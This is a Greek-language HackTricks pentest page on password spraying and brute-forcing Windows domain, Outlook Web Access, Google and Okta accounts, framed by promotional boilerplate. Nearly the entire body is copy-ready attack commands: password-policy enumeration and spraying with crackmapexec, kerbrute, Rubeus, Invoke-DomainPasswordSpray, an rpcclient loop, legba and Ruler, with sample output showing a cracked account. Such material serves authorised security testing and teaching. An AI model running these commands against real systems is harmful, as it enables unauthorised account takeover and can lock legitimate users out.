hacktricks/windows-hardening/active-directory-methodology/password-spraying.md

Επίθεση με Κατανομή Κωδικών Πρόσβασης / Βίαιη Δοκιμή

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

• Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
• Αποκτήστε το επίσημο PEASS & HackTricks swag
• Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
• Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.

Επίθεση με Κατανομή Κωδικών Πρόσβασης

Αφού βρείτε αρκετά έγκυρα ονόματα χρηστών μπορείτε να δοκιμάσετε τους πιο συνηθισμένους κωδικούς πρόσβασης (λαμβάνοντας υπόψη την πολιτική κωδικού πρόσβασης του περιβάλλοντος) με κάθε έναν από τους ανακαλυφθέντες χρήστες.
Από προεπιλογή, το ελάχιστο μήκος του κωδικού πρόσβασης είναι 7.

Λίστες με συνηθισμένα ονόματα χρηστών μπορεί να είναι χρήσιμες επίσης: https://github.com/insidetrust/statistically-likely-usernames

Προσέξτε ότι μπορείτε να κλειδώσετε ορισμένους λογαριασμούς εάν δοκιμάσετε πολλούς λανθασμένους κωδικούς πρόσβασης (προεπιλογή περισσότερο από 10).

Λήψη πολιτικής κωδικού πρόσβασης

Εάν έχετε κάποια διαπιστευτήρια χρήστη ή ένα κέλυφος ως χρήστης του τομέα μπορείτε να λάβετε την πολιτική κωδικού πρόσβασης με:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Εκμετάλλευση από Linux (ή όλα)

• Χρησιμοποιώντας το crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

• Χρησιμοποιώντας το kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

• spray (μπορείτε να υποδείξετε τον αριθμό των προσπαθειών για να αποφύγετε το κλείδωμα):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

• Χρησιμοποιώντας το kerbrute (python) - ΔΕΝ ΣΥΣΤΉΝΕΤΑΙ ΠΑΝΤΑ ΔΟΥΛΕΥΕΙ

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

• Με το εργαλείο scanner/smb/smb_login του Metasploit:

• Χρησιμοποιώντας το rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Από τα Windows

• Με την έκδοση Rubeus με το brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

• Με το Invoke-DomainPasswordSpray (Μπορεί να δημιουργήσει χρήστες από τον τομέα από προεπιλογή και θα λάβει την πολιτική κωδικού πρόσβασης από τον τομέα και θα περιορίσει τις προσπάθειες ανάλογα με αυτήν):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

• Με το Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Βίαιη Δύναμη

{% code overflow="wrap" %}

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

{% endcode %}

Outlook Web Access

Υπάρχουν πολλά εργαλεία για το password spraying στο Outlook.

• Με το MSF Owa_login
• Με το MSF Owa_ews_login
• Με το Ruler (αξιόπιστο!)
• Με το DomainPasswordSpray (Powershell)
• Με το MailSniper (Powershell)

Για να χρησιμοποιήσετε οποιοδήποτε από αυτά τα εργαλεία, χρειάζεστε μια λίστα χρηστών και έναν κωδικό πρόσβασης / μια μικρή λίστα κωδικών πρόσβασης για να κάνετε spraying.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

• https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

• https://github.com/ustayready/CredKing/blob/master/credking.py
• https://github.com/Rhynorater/Okta-Password-Sprayer
• https://github.com/knavesec/CredMaster

Αναφορές

• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
• https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
• www.blackhillsinfosec.com/?p=5296
• https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

• Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
• Αποκτήστε το επίσημο PEASS & HackTricks swag
• Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
• Συμμετάσχετε στη 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
• Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.